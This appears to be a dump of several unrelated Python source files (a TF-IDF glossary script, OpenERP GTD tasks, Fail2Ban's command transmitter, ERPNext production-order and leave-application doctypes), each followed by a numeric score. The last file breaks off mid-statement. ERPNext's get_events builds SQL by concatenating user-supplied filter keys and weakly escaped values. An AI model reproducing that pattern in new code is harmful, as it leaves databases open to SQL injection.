from sklearn.feature_extraction.text import TfidfVectorizer from sklearn.metrics.pairwise import cosine_similarity import statistics #from scipy.stats import norm import scipy as sp from scipy import stats from scipy.stats import norm from lxml import etree glossary = etree.parse("glossary.xml") detval = [] num = 1 for entry_obj in glossary.findall("Entry"): concepts = [] conList = [] term_name = entry_obj.find("Term").text.lower() #print term_name #connum = 0 #if term_name == "firewall": print term_name length = 1 for concept_obj in entry_obj.findall("Concept"): #print concept_obj.text #connum += 1 #if len(concept_obj) < 6: #continue length += 1 #print concept_obj.text splitgroup = concept_obj.text.split(' ') #if len(splitgroup) < 6: #continue concepts.append(concept_obj.text) docs = [concept_obj.text] # get each word instr = "" for word in splitgroup: instr += (' ' + word) docs.append(instr) tfidf_vectorizer = TfidfVectorizer() tfidf_matrix = tfidf_vectorizer.fit_transform(docs) #print tfidf_matrix.shape matrix = cosine_similarity(tfidf_matrix[0:1], tfidf_matrix) #print matrix for row in matrix: for x in row[1:]: conList.append(x) #print (statistics.median(conList) /statistics.pstdev(conList)) #thld = statistics.median(conList) + statistics.pstdev(conList) mean = statistics.mean(conList) conf = stats.norm.interval(0.95 ,loc=mean,scale=statistics.pstdev(conList)) thld1 = 1 - (1*statistics.pstdev(conList)) - conf[0] thld2 = 1 - (2*statistics.pstdev(conList)) #print thld1 - conf[0] if thld1 > 1: thld = (statistics.median(conList)) detval.append(thld1) #print thld1 #print thld2 num += 1 #break #tfidf_vectorizer = TfidfVectorizer() tfidf_matrix = tfidf_vectorizer.fit_transform(concepts) #print tfidf_matrix.shape matrix = cosine_similarity(tfidf_matrix[0:len(concepts)], tfidf_matrix) #print matrix index = 0 #print 2*"\n" rnum = 1 for row in matrix: xindex = 0 for x in row: if x >= detval[index]: #print index , xindex if xindex == index: continue else: #x #print "same" #print "Match - Row: ", row, "Value: " , x #print concepts[index] #print concepts[xindex] print rnum, " Row - ", index, "Column - ", xindex, "Value needed - ",detval[index], " Matched on - ", x rnum += 1 xindex += 1 index += 1 print "Done"
0.06746
# -*- coding: utf-8 -*- ############################################################################## # # OpenERP, Open Source Management Solution # Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>). # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU Affero General Public License as # published by the Free Software Foundation, either version 3 of the # License, or (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU Affero General Public License for more details. # # You should have received a copy of the GNU Affero General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. # ############################################################################## from openerp.osv import fields, osv from openerp import tools class project_gtd_context(osv.Model): _name = "project.gtd.context" _description = "Context" _columns = { 'name': fields.char( 'Context', size=64, required=True, translate=True), 'sequence': fields.integer( 'Sequence', help=("Gives the sequence order when displaying " "a list of contexts.")), } _defaults = { 'sequence': 1 } _order = "sequence, name" class project_gtd_timebox(osv.Model): _name = "project.gtd.timebox" _order = "sequence" _columns = { 'name': fields.char( 'Timebox', size=64, required=True, select=1, translate=1), 'sequence': fields.integer( 'Sequence', help="Gives the sequence order when displaying " "a list of timebox."), } class project_task(osv.Model): _inherit = "project.task" _columns = { 'timebox_id': fields.many2one( 'project.gtd.timebox', "Timebox", help="Time-laps during which task has to be treated"), 'context_id': fields.many2one( 'project.gtd.context', "Context", help="The context place where user has to treat task"), } def _get_context(self, cr, uid, context=None): ids = self.pool.get('project.gtd.context').search( cr, uid, [], context=context) return ids and ids[0] or False def _read_group_timebox_ids( self, cr, uid, ids, domain, read_group_order=None, access_rights_uid=None, context=None): """Used to display all timeboxes on the view.""" timebox_obj = self.pool.get('project.gtd.timebox') order = timebox_obj._order access_rights_uid = access_rights_uid or uid timebox_ids = timebox_obj._search( cr, uid, [], order=order, access_rights_uid=access_rights_uid, context=context) result = timebox_obj.name_get( cr, access_rights_uid, timebox_ids, context=context) # Restore order of the search result.sort( lambda x, y: cmp(timebox_ids.index(x[0]), timebox_ids.index(y[0]))) fold = dict.fromkeys(timebox_ids, False) return result, fold _defaults = { 'context_id': _get_context } _group_by_full = { 'timebox_id': _read_group_timebox_ids, } def copy_data(self, cr, uid, id, default=None, context=None): if context is None: context = {} if not default: default = {} default['timebox_id'] = False default['context_id'] = False return super(project_task, self).copy_data( cr, uid, id, default, context) def next_timebox(self, cr, uid, ids, *args): timebox_obj = self.pool.get('project.gtd.timebox') timebox_ids = timebox_obj.search(cr, uid, []) if not timebox_ids: return True for task in self.browse(cr, uid, ids): timebox = task.timebox_id if not timebox: self.write(cr, uid, task.id, {'timebox_id': timebox_ids[0]}) elif timebox_ids.index(timebox) != len(timebox_ids)-1: index = timebox_ids.index(timebox) self.write( cr, uid, task.id, {'timebox_id': timebox_ids[index+1]}) return True def prev_timebox(self, cr, uid, ids, *args): timebox_obj = self.pool.get('project.gtd.timebox') timebox_ids = timebox_obj.search(cr, uid, []) for task in self.browse(cr, uid, ids): timebox = task.timebox_id if timebox: if timebox_ids.index(timebox): index = timebox_ids.index(timebox) self.write( cr, uid, task.id, {'timebox_id': timebox_ids[index - 1]}) else: self.write(cr, uid, task.id, {'timebox_id': False}) return True def fields_view_get(self, cr, uid, view_id=None, view_type='form', context=None, toolbar=False, submenu=False): if not context: context = {} res = super(project_task, self).fields_view_get( cr, uid, view_id, view_type, context, toolbar=toolbar, submenu=submenu) search_extended = False timebox_obj = self.pool.get('project.gtd.timebox') if (res['type'] == 'search') and context.get('gtd', False): timeboxes = timebox_obj.browse( cr, uid, timebox_obj.search(cr, uid, []), context=context) search_extended = '' for timebox in timeboxes: filter_ = u""" <filter domain="[('timebox_id', '=', {timebox_id})]" string="{string}"/>\n """.format(timebox_id=timebox.id, string=timebox.name) search_extended += filter_ search_extended += '<separator orientation="vertical"/>' res['arch'] = tools.ustr(res['arch']).replace( '<separator name="gtdsep"/>', search_extended) return res # vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
0
# emacs: -*- mode: python; py-indent-offset: 4; indent-tabs-mode: t -*- # vi: set ft=python sts=4 ts=4 sw=4 noet : # This file is part of Fail2Ban. # # Fail2Ban is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation; either version 2 of the License, or # (at your option) any later version. # # Fail2Ban is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with Fail2Ban; if not, write to the Free Software # Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. # Author: Cyril Jaquier # __author__ = "Cyril Jaquier" __copyright__ = "Copyright (c) 2004 Cyril Jaquier" __license__ = "GPL" import time import json from ..helpers import getLogger from .. import version # Gets the instance of the logger. logSys = getLogger(__name__) class Transmitter: ## # Constructor. # # @param The server reference def __init__(self, server): self.__server = server ## # Proceeds a command. # # Proceeds an incoming command. # @param command The incoming command def proceed(self, command): # Deserialize object logSys.debug("Command: " + repr(command)) try: ret = self.__commandHandler(command) ack = 0, ret except Exception as e: logSys.warning("Command %r has failed. Received %r" % (command, e)) ack = 1, e return ack ## # Handle an command. # # def __commandHandler(self, command): if command[0] == "ping": return "pong" elif command[0] == "add": name = command[1] if name == "all": raise Exception("Reserved name") try: backend = command[2] except IndexError: backend = "auto" self.__server.addJail(name, backend) return name elif command[0] == "start": name = command[1] self.__server.startJail(name) return None elif command[0] == "stop": if len(command) == 1: self.__server.quit() elif command[1] == "all": self.__server.stopAllJail() else: name = command[1] self.__server.stopJail(name) return None elif command[0] == "sleep": value = command[1] time.sleep(int(value)) return None elif command[0] == "flushlogs": return self.__server.flushLogs() elif command[0] == "set": return self.__commandSet(command[1:]) elif command[0] == "get": return self.__commandGet(command[1:]) elif command[0] == "status": return self.status(command[1:]) elif command[0] == "version": return version.version raise Exception("Invalid command") def __commandSet(self, command): name = command[0] # Logging if name == "loglevel": value = command[1] self.__server.setLogLevel(value) return self.__server.getLogLevel() elif name == "logtarget": value = command[1] if self.__server.setLogTarget(value): return self.__server.getLogTarget() else: raise Exception("Failed to change log target") elif name == "syslogsocket": value = command[1] if self.__server.setSyslogSocket(value): return self.__server.getSyslogSocket() else: raise Exception("Failed to change syslog socket") #Database elif name == "dbfile": self.__server.setDatabase(command[1]) db = self.__server.getDatabase() if db is None: return None else: return db.filename elif name == "dbpurgeage": db = self.__server.getDatabase() if db is None: logSys.warning("dbpurgeage setting was not in effect since no db yet") return None else: db.purgeage = command[1] return db.purgeage # Jail elif command[1] == "idle": if command[2] == "on": self.__server.setIdleJail(name, True) elif command[2] == "off": self.__server.setIdleJail(name, False) else: raise Exception("Invalid idle option, must be 'on' or 'off'") return self.__server.getIdleJail(name) # Filter elif command[1] == "addignoreip": value = command[2] self.__server.addIgnoreIP(name, value) return self.__server.getIgnoreIP(name) elif command[1] == "delignoreip": value = command[2] self.__server.delIgnoreIP(name, value) return self.__server.getIgnoreIP(name) elif command[1] == "ignorecommand": value = command[2] self.__server.setIgnoreCommand(name, value) return self.__server.getIgnoreCommand(name) elif command[1] == "addlogpath": value = command[2] tail = False if len(command) == 4: if command[3].lower() == "tail": tail = True elif command[3].lower() != "head": raise ValueError("File option must be 'head' or 'tail'") elif len(command) > 4: raise ValueError("Only one file can be added at a time") self.__server.addLogPath(name, value, tail) return self.__server.getLogPath(name) elif command[1] == "dellogpath": value = command[2] self.__server.delLogPath(name, value) return self.__server.getLogPath(name) elif command[1] == "logencoding": value = command[2] self.__server.setLogEncoding(name, value) return self.__server.getLogEncoding(name) elif command[1] == "addjournalmatch": # pragma: systemd no cover value = command[2:] self.__server.addJournalMatch(name, value) return self.__server.getJournalMatch(name) elif command[1] == "deljournalmatch": # pragma: systemd no cover value = command[2:] self.__server.delJournalMatch(name, value) return self.__server.getJournalMatch(name) elif command[1] == "addfailregex": value = command[2] self.__server.addFailRegex(name, value) return self.__server.getFailRegex(name) elif command[1] == "delfailregex": value = int(command[2]) self.__server.delFailRegex(name, value) return self.__server.getFailRegex(name) elif command[1] == "addignoreregex": value = command[2] self.__server.addIgnoreRegex(name, value) return self.__server.getIgnoreRegex(name) elif command[1] == "delignoreregex": value = int(command[2]) self.__server.delIgnoreRegex(name, value) return self.__server.getIgnoreRegex(name) elif command[1] == "usedns": value = command[2] self.__server.setUseDns(name, value) return self.__server.getUseDns(name) elif command[1] == "findtime": value = command[2] self.__server.setFindTime(name, int(value)) return self.__server.getFindTime(name) elif command[1] == "datepattern": value = command[2] self.__server.setDatePattern(name, value) return self.__server.getDatePattern(name) elif command[1] == "maxretry": value = command[2] self.__server.setMaxRetry(name, int(value)) return self.__server.getMaxRetry(name) elif command[1] == "maxlines": value = command[2] self.__server.setMaxLines(name, int(value)) return self.__server.getMaxLines(name) # command elif command[1] == "bantime": value = command[2] self.__server.setBanTime(name, int(value)) return self.__server.getBanTime(name) elif command[1] == "banip": value = command[2] return self.__server.setBanIP(name,value) elif command[1] == "unbanip": value = command[2] self.__server.setUnbanIP(name, value) return value elif command[1] == "addaction": args = [command[2]] if len(command) > 3: args.extend([command[3], json.loads(command[4])]) self.__server.addAction(name, *args) return args[0] elif command[1] == "delaction": value = command[2] self.__server.delAction(name, value) return None elif command[1] == "action": actionname = command[2] actionkey = command[3] action = self.__server.getAction(name, actionname) if callable(getattr(action, actionkey, None)): actionvalue = json.loads(command[4]) if len(command)>4 else {} return getattr(action, actionkey)(**actionvalue) else: actionvalue = command[4] setattr(action, actionkey, actionvalue) return getattr(action, actionkey) raise Exception("Invalid command (no set action or not yet implemented)") def __commandGet(self, command): name = command[0] # Logging if name == "loglevel": return self.__server.getLogLevel() elif name == "logtarget": return self.__server.getLogTarget() elif name == "syslogsocket": return self.__server.getSyslogSocket() #Database elif name == "dbfile": db = self.__server.getDatabase() if db is None: return None else: return db.filename elif name == "dbpurgeage": db = self.__server.getDatabase() if db is None: return None else: return db.purgeage # Filter elif command[1] == "logpath": return self.__server.getLogPath(name) elif command[1] == "logencoding": return self.__server.getLogEncoding(name) elif command[1] == "journalmatch": # pragma: systemd no cover return self.__server.getJournalMatch(name) elif command[1] == "ignoreip": return self.__server.getIgnoreIP(name) elif command[1] == "ignorecommand": return self.__server.getIgnoreCommand(name) elif command[1] == "failregex": return self.__server.getFailRegex(name) elif command[1] == "ignoreregex": return self.__server.getIgnoreRegex(name) elif command[1] == "usedns": return self.__server.getUseDns(name) elif command[1] == "findtime": return self.__server.getFindTime(name) elif command[1] == "datepattern": return self.__server.getDatePattern(name) elif command[1] == "maxretry": return self.__server.getMaxRetry(name) elif command[1] == "maxlines": return self.__server.getMaxLines(name) # Action elif command[1] == "bantime": return self.__server.getBanTime(name) elif command[1] == "actions": return self.__server.getActions(name).keys() elif command[1] == "action": actionname = command[2] actionvalue = command[3] action = self.__server.getAction(name, actionname) return getattr(action, actionvalue) elif command[1] == "actionproperties": actionname = command[2] action = self.__server.getAction(name, actionname) return [ key for key in dir(action) if not key.startswith("_") and not callable(getattr(action, key))] elif command[1] == "actionmethods": actionname = command[2] action = self.__server.getAction(name, actionname) return [ key for key in dir(action) if not key.startswith("_") and callable(getattr(action, key))] raise Exception("Invalid command (no get action or not yet implemented)") def status(self, command): if len(command) == 0: return self.__server.status() elif len(command) == 1: name = command[0] return self.__server.statusJail(name) elif len(command) == 2: name = command[0] flavor = command[1] return self.__server.statusJail(name, flavor=flavor) raise Exception("Invalid command (no status)")
0.030901
# Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors # License: GNU General Public License v3. See license.txt from __future__ import unicode_literals import frappe, json from frappe.utils import flt, nowdate, get_datetime, getdate, date_diff, cint from frappe import _ from frappe.model.document import Document from erpnext.manufacturing.doctype.bom.bom import validate_bom_no from dateutil.relativedelta import relativedelta class OverProductionError(frappe.ValidationError): pass class StockOverProductionError(frappe.ValidationError): pass class OperationTooLongError(frappe.ValidationError): pass from erpnext.manufacturing.doctype.workstation.workstation import WorkstationHolidayError, NotInWorkingHoursError from erpnext.projects.doctype.time_log.time_log import OverlapError form_grid_templates = { "operations": "templates/form_grid/production_order_grid.html" } class ProductionOrder(Document): def validate(self): if self.docstatus == 0: self.status = "Draft" from erpnext.controllers.status_updater import validate_status validate_status(self.status, ["Draft", "Submitted", "Stopped", "In Process", "Completed", "Cancelled"]) self.validate_production_item() if self.bom_no: validate_bom_no(self.production_item, self.bom_no) self.validate_sales_order() self.validate_warehouse() self.calculate_operating_cost() self.validate_delivery_date() from erpnext.utilities.transaction_base import validate_uom_is_integer validate_uom_is_integer(self, "stock_uom", ["qty", "produced_qty"]) def validate_sales_order(self): if self.sales_order: so = frappe.db.sql("""select name, delivery_date from `tabSales Order` where name=%s and docstatus = 1""", self.sales_order, as_dict=1) if len(so): if not self.expected_delivery_date: self.expected_delivery_date = so[0].delivery_date self.validate_production_order_against_so() else: frappe.throw(_("Sales Order {0} is not valid").format(self.sales_order)) def validate_warehouse(self): from erpnext.stock.utils import validate_warehouse_company for w in [self.fg_warehouse, self.wip_warehouse]: validate_warehouse_company(w, self.company) def calculate_operating_cost(self): self.planned_operating_cost, self.actual_operating_cost = 0.0, 0.0 for d in self.get("operations"): d.planned_operating_cost = flt(d.hour_rate) * (flt(d.time_in_mins) / 60.0) d.actual_operating_cost = flt(d.hour_rate) * (flt(d.actual_operation_time) / 60.0) self.planned_operating_cost += flt(d.planned_operating_cost) self.actual_operating_cost += flt(d.actual_operating_cost) variable_cost = self.actual_operating_cost if self.actual_operating_cost else self.planned_operating_cost self.total_operating_cost = flt(self.additional_operating_cost) + flt(variable_cost) def validate_production_order_against_so(self): # already ordered qty ordered_qty_against_so = frappe.db.sql("""select sum(qty) from `tabProduction Order` where production_item = %s and sales_order = %s and docstatus < 2 and name != %s""", (self.production_item, self.sales_order, self.name))[0][0] total_qty = flt(ordered_qty_against_so) + flt(self.qty) # get qty from Sales Order Item table so_item_qty = frappe.db.sql("""select sum(qty) from `tabSales Order Item` where parent = %s and item_code = %s""", (self.sales_order, self.production_item))[0][0] # get qty from Packing Item table dnpi_qty = frappe.db.sql("""select sum(qty) from `tabPacked Item` where parent = %s and parenttype = 'Sales Order' and item_code = %s""", (self.sales_order, self.production_item))[0][0] # total qty in SO so_qty = flt(so_item_qty) + flt(dnpi_qty) allowance_percentage = flt(frappe.db.get_single_value("Manufacturing Settings", "over_production_allowance_percentage")) if total_qty > so_qty + (allowance_percentage/100 * so_qty): frappe.throw(_("Cannot produce more Item {0} than Sales Order quantity {1}").format(self.production_item, so_qty), OverProductionError) def stop_unstop(self, status): """ Called from client side on Stop/Unstop event""" self.update_status(status) qty = (flt(self.qty)-flt(self.produced_qty)) * ((status == 'Stopped') and -1 or 1) self.update_planned_qty(qty) frappe.msgprint(_("Production Order status is {0}").format(status)) def update_status(self, status=None): if not status: status = self.status if status != 'Stopped': stock_entries = frappe._dict(frappe.db.sql("""select purpose, sum(fg_completed_qty) from `tabStock Entry` where production_order=%s and docstatus=1 group by purpose""", self.name)) status = "Submitted" if stock_entries: status = "In Process" produced_qty = stock_entries.get("Manufacture") if flt(produced_qty) == flt(self.qty): status = "Completed" if status != self.status: self.db_set("status", status) def update_production_order_qty(self): """Update **Manufactured Qty** and **Material Transferred for Qty** in Production Order based on Stock Entry""" for purpose, fieldname in (("Manufacture", "produced_qty"), ("Material Transfer for Manufacture", "material_transferred_for_manufacturing")): qty = flt(frappe.db.sql("""select sum(fg_completed_qty) from `tabStock Entry` where production_order=%s and docstatus=1 and purpose=%s""", (self.name, purpose))[0][0]) if qty > self.qty: frappe.throw(_("{0} ({1}) cannot be greater than planned quanitity ({2}) in Production Order {3}").format(\ self.meta.get_label(fieldname), qty, self.qty, self.name), StockOverProductionError) self.db_set(fieldname, qty) def on_submit(self): if not self.wip_warehouse: frappe.throw(_("Work-in-Progress Warehouse is required before Submit")) if not self.fg_warehouse: frappe.throw(_("For Warehouse is required before Submit")) frappe.db.set(self,'status', 'Submitted') self.make_time_logs() self.update_planned_qty(self.qty) def on_cancel(self): # Check whether any stock entry exists against this Production Order stock_entry = frappe.db.sql("""select name from `tabStock Entry` where production_order = %s and docstatus = 1""", self.name) if stock_entry: frappe.throw(_("Cannot cancel because submitted Stock Entry {0} exists").format(stock_entry[0][0])) frappe.db.set(self,'status', 'Cancelled') self.update_planned_qty(-self.qty) self.delete_time_logs() def update_planned_qty(self, qty): """update planned qty in bin""" args = { "item_code": self.production_item, "warehouse": self.fg_warehouse, "posting_date": nowdate(), "planned_qty": flt(qty) } from erpnext.stock.utils import update_bin update_bin(args) def set_production_order_operations(self): """Fetch operations from BOM and set in 'Production Order'""" if not self.bom_no: return self.set('operations', []) operations = frappe.db.sql("""select operation, description, workstation, idx, hour_rate, time_in_mins, "Pending" as status from `tabBOM Operation` where parent = %s order by idx""", self.bom_no, as_dict=1) if operations: self.track_operations=1 else: self.track_operations=0 frappe.msgprint(_("Cannot 'track operations' as selected BOM does not have Operations.")) self.set('operations', operations) self.calculate_time() def calculate_time(self): bom_qty = frappe.db.get_value("BOM", self.bom_no, "quantity") for d in self.get("operations"): d.time_in_mins = flt(d.time_in_mins) / flt(bom_qty) * flt(self.qty) self.calculate_operating_cost() def get_holidays(self, workstation): holiday_list = frappe.db.get_value("Workstation", workstation, "holiday_list") holidays = {} if holiday_list not in holidays: holiday_list_days = [getdate(d[0]) for d in frappe.get_all("Holiday", fields=["holiday_date"], filters={"parent": holiday_list}, order_by="holiday_date", limit_page_length=0, as_list=1)] holidays[holiday_list] = holiday_list_days return holidays[holiday_list] def make_time_logs(self): """Capacity Planning. Plan time logs based on earliest availablity of workstation after Planned Start Date. Time logs will be created and remain in Draft mode and must be submitted before manufacturing entry can be made.""" if not self.operations: return time_logs = [] plan_days = frappe.db.get_single_value("Manufacturing Settings", "capacity_planning_for_days") or 30 for i, d in enumerate(self.operations): self.set_operation_start_end_time(i, d) time_log = make_time_log(self.name, d.operation, d.planned_start_time, d.planned_end_time, flt(self.qty) - flt(d.completed_qty), self.project_name, d.workstation, operation_id=d.name) if d.workstation: # validate operating hours if workstation [not mandatory] is specified self.check_operation_fits_in_working_hours(d) original_start_time = time_log.from_time while True: _from_time = time_log.from_time try: time_log.save() break except WorkstationHolidayError: time_log.move_to_next_day() except NotInWorkingHoursError: time_log.move_to_next_working_slot() except OverlapError: time_log.move_to_next_non_overlapping_slot() # reset end time time_log.to_time = get_datetime(time_log.from_time) + relativedelta(minutes=d.time_in_mins) if date_diff(time_log.from_time, original_start_time) > plan_days: frappe.msgprint(_("Unable to find Time Slot in the next {0} days for Operation {1}").format(plan_days, d.operation)) break if _from_time == time_log.from_time: frappe.throw("Capacity Planning Error") d.planned_start_time = time_log.from_time d.planned_end_time = time_log.to_time d.db_update() if time_log.name: time_logs.append(time_log.name) self.planned_end_date = self.operations[-1].planned_end_time if time_logs: frappe.local.message_log = [] frappe.msgprint(_("Time Logs created:") + "\n" + "\n".join(time_logs)) def set_operation_start_end_time(self, i, d): """Set start and end time for given operation. If first operation, set start as `planned_start_date`, else add time diff to end time of earlier operation.""" if self.planned_start_date: if i==0: # first operation at planned_start date d.planned_start_time = self.planned_start_date else: d.planned_start_time = get_datetime(self.operations[i-1].planned_end_time)\ + self.get_mins_between_operations() d.planned_end_time = get_datetime(d.planned_start_time) + relativedelta(minutes = d.time_in_mins) if d.planned_start_time == d.planned_end_time: frappe.throw(_("Capacity Planning Error")) def get_mins_between_operations(self): if not hasattr(self, "_mins_between_operations"): self._mins_between_operations = cint(frappe.db.get_single_value("Manufacturing Settings", "mins_between_operations")) or 10 return relativedelta(minutes=self._mins_between_operations) def check_operation_fits_in_working_hours(self, d): """Raises expection if operation is longer than working hours in the given workstation.""" from erpnext.manufacturing.doctype.workstation.workstation import check_if_within_operating_hours check_if_within_operating_hours(d.workstation, d.operation, d.planned_start_time, d.planned_end_time) def update_operation_status(self): for d in self.get("operations"): if not d.completed_qty: d.status = "Pending" elif flt(d.completed_qty) < flt(self.qty): d.status = "Work in Progress" elif flt(d.completed_qty) == flt(self.qty): d.status = "Completed" else: frappe.throw(_("Completed Qty can not be greater than 'Qty to Manufacture'")) def set_actual_dates(self): if self.get("operations"): actual_date = frappe.db.sql("""select min(actual_start_time) as start_date, max(actual_end_time) as end_date from `tabProduction Order Operation` where parent = %s and docstatus=1""", self.name, as_dict=1)[0] self.actual_start_date = actual_date.start_date self.actual_end_date = actual_date.end_date else: self.actual_start_date = None self.actual_end_date = None def validate_delivery_date(self): if self.planned_start_date and self.expected_delivery_date \ and getdate(self.expected_delivery_date) < getdate(self.planned_start_date): frappe.msgprint(_("Expected Delivery Date is lesser than Planned Start Date.")) def delete_time_logs(self): for time_log in frappe.get_all("Time Log", ["name"], {"production_order": self.name}): frappe.delete_doc("Time Log", time_log.name) def validate_production_item(self): if frappe.db.get_value("Item", self.production_item, "is_pro_applicable")=='No': frappe.throw(_("Item is not allowed to have Production Order.")) if frappe.db.get_value("Item", self.production_item, "has_variants"): frappe.throw(_("Production Order cannot be raised against a Item Template")) @frappe.whitelist() def get_item_details(item): res = frappe.db.sql("""select stock_uom, description from `tabItem` where (ifnull(end_of_life, "0000-00-00")="0000-00-00" or end_of_life > now()) and name=%s""", item, as_dict=1) if not res: return {} res = res[0] res["bom_no"] = frappe.db.get_value("BOM", filters={"item": item, "is_default": 1}) if not res["bom_no"]: variant_of= frappe.db.get_value("Item", item, "variant_of") if variant_of: res["bom_no"] = frappe.db.get_value("BOM", filters={"item": variant_of, "is_default": 1}) return res @frappe.whitelist() def make_stock_entry(production_order_id, purpose, qty=None): production_order = frappe.get_doc("Production Order", production_order_id) stock_entry = frappe.new_doc("Stock Entry") stock_entry.purpose = purpose stock_entry.production_order = production_order_id stock_entry.company = production_order.company stock_entry.from_bom = 1 stock_entry.bom_no = production_order.bom_no stock_entry.additional_operating_cost = production_order.additional_operating_cost stock_entry.use_multi_level_bom = production_order.use_multi_level_bom stock_entry.fg_completed_qty = qty or (flt(production_order.qty) - flt(production_order.produced_qty)) if purpose=="Material Transfer for Manufacture": stock_entry.to_warehouse = production_order.wip_warehouse else: stock_entry.from_warehouse = production_order.wip_warehouse stock_entry.to_warehouse = production_order.fg_warehouse stock_entry.get_items() return stock_entry.as_dict() @frappe.whitelist() def get_events(start, end, filters=None): from frappe.desk.reportview import build_match_conditions if not frappe.has_permission("Production Order"): frappe.msgprint(_("No Permission"), raise_exception=1) conditions = build_match_conditions("Production Order") conditions = conditions and (" and " + conditions) or "" if filters: filters = json.loads(filters) for key in filters: if filters[key]: conditions += " and " + key + ' = "' + filters[key].replace('"', '\"') + '"' data = frappe.db.sql("""select name, production_item, planned_start_date, planned_end_date from `tabProduction Order` where ((ifnull(planned_start_date, '0000-00-00')!= '0000-00-00') \ and (planned_start_date between %(start)s and %(end)s) \ or ((ifnull(planned_start_date, '0000-00-00')!= '0000-00-00') \ and planned_end_date between %(start)s and %(end)s)) {conditions} """.format(conditions=conditions), { "start": start, "end": end }, as_dict=True, update={"allDay": 0}) return data @frappe.whitelist() def make_time_log(name, operation, from_time=None, to_time=None, qty=None, project=None, workstation=None, operation_id=None): time_log = frappe.new_doc("Time Log") time_log.for_manufacturing = 1 time_log.from_time = from_time time_log.to_time = to_time time_log.production_order = name time_log.project = project time_log.operation_id = operation_id time_log.operation = operation time_log.workstation= workstation time_log.activity_type= "Manufacturing" time_log.completed_qty = flt(qty) if from_time and to_time : time_log.calculate_total_hours() return time_log
0.02492
# Copyright (c) 2013, Web Notes Technologies Pvt. Ltd. and Contributors # License: GNU General Public License v3. See license.txt from __future__ import unicode_literals import frappe, json from frappe import _ from frappe.utils import cint, cstr, date_diff, flt, formatdate, getdate, get_url_to_form, \ comma_or, get_fullname from frappe import msgprint from erpnext.hr.utils import set_employee_name class LeaveDayBlockedError(frappe.ValidationError): pass class OverlapError(frappe.ValidationError): pass class InvalidLeaveApproverError(frappe.ValidationError): pass class LeaveApproverIdentityError(frappe.ValidationError): pass from frappe.model.document import Document class LeaveApplication(Document): def validate(self): if not getattr(self, "__islocal", None) and frappe.db.exists(self.doctype, self.name): self.previous_doc = frappe.db.get_value(self.doctype, self.name, "*", as_dict=True) else: self.previous_doc = None set_employee_name(self) self.validate_to_date() self.validate_balance_leaves() self.validate_leave_overlap() self.validate_max_days() self.show_block_day_warning() self.validate_block_days() self.validate_leave_approver() def on_update(self): if (not self.previous_doc and self.leave_approver) or (self.previous_doc and \ self.status == "Open" and self.previous_doc.leave_approver != self.leave_approver): # notify leave approver about creation self.notify_leave_approver() elif self.previous_doc and \ self.previous_doc.status == "Open" and self.status == "Rejected": # notify employee about rejection self.notify_employee(self.status) def on_submit(self): if self.status != "Approved": frappe.throw(_("Only Leave Applications with status 'Approved' can be submitted")) # notify leave applier about approval self.notify_employee(self.status) def on_cancel(self): # notify leave applier about cancellation self.notify_employee("cancelled") def show_block_day_warning(self): from erpnext.hr.doctype.leave_block_list.leave_block_list import get_applicable_block_dates block_dates = get_applicable_block_dates(self.from_date, self.to_date, self.employee, self.company, all_lists=True) if block_dates: frappe.msgprint(_("Warning: Leave application contains following block dates") + ":") for d in block_dates: frappe.msgprint(formatdate(d.block_date) + ": " + d.reason) def validate_block_days(self): from erpnext.hr.doctype.leave_block_list.leave_block_list import get_applicable_block_dates block_dates = get_applicable_block_dates(self.from_date, self.to_date, self.employee, self.company) if block_dates: if self.status == "Approved": frappe.throw(_("Cannot approve leave as you are not authorized to approve leaves on Block Dates"), LeaveDayBlockedError) def get_holidays(self): return get_holidays(self) def get_total_leave_days(self): return get_total_leave_days(self) def validate_to_date(self): if self.from_date and self.to_date and \ (getdate(self.to_date) < getdate(self.from_date)): frappe.throw(_("To date cannot be before from date")) def validate_balance_leaves(self): if self.from_date and self.to_date: self.total_leave_days = self.get_total_leave_days()["total_leave_days"] if self.total_leave_days == 0: frappe.throw(_("The day(s) on which you are applying for leave are holiday. You need not apply for leave.")) if not is_lwp(self.leave_type): self.leave_balance = get_leave_balance(self.employee, self.leave_type, self.fiscal_year)["leave_balance"] if self.status != "Rejected" \ and self.leave_balance - self.total_leave_days < 0: #check if this leave type allow the remaining balance to be in negative. If yes then warn the user and continue to save else warn the user and don't save. if frappe.db.get_value("Leave Type", self.leave_type, "allow_negative"): frappe.msgprint(_("Note: There is not enough leave balance for Leave Type {0}").format(self.leave_type)) else: frappe.throw(_("There is not enough leave balance for Leave Type {0}").format(self.leave_type)) def validate_leave_overlap(self): if not self.name: self.name = "New Leave Application" for d in frappe.db.sql("""select name, leave_type, posting_date, from_date, to_date from `tabLeave Application` where employee = %(employee)s and docstatus < 2 and status in ("Open", "Approved") and (from_date between %(from_date)s and %(to_date)s or to_date between %(from_date)s and %(to_date)s or %(from_date)s between from_date and to_date) and name != %(name)s""", { "employee": self.employee, "from_date": self.from_date, "to_date": self.to_date, "name": self.name }, as_dict = 1): frappe.msgprint(_("Employee {0} has already applied for {1} between {2} and {3}").format(self.employee, cstr(d['leave_type']), formatdate(d['from_date']), formatdate(d['to_date']))) frappe.throw('<a href="#Form/Leave Application/{0}">{0}</a>'.format(d["name"]), OverlapError) def validate_max_days(self): max_days = frappe.db.get_value("Leave Type", self.leave_type, "max_days_allowed") if max_days and self.total_leave_days > max_days: frappe.throw(_("Leave of type {0} cannot be longer than {1}").format(self.leave_type, max_days)) def validate_leave_approver(self): employee = frappe.get_doc("Employee", self.employee) leave_approvers = [l.leave_approver for l in employee.get("employee_leave_approvers")] if len(leave_approvers) and self.leave_approver not in leave_approvers: frappe.throw(_("Leave approver must be one of {0}").format(comma_or(leave_approvers)), InvalidLeaveApproverError) elif self.leave_approver and not frappe.db.sql("""select name from `tabUserRole` where parent=%s and role='Leave Approver'""", 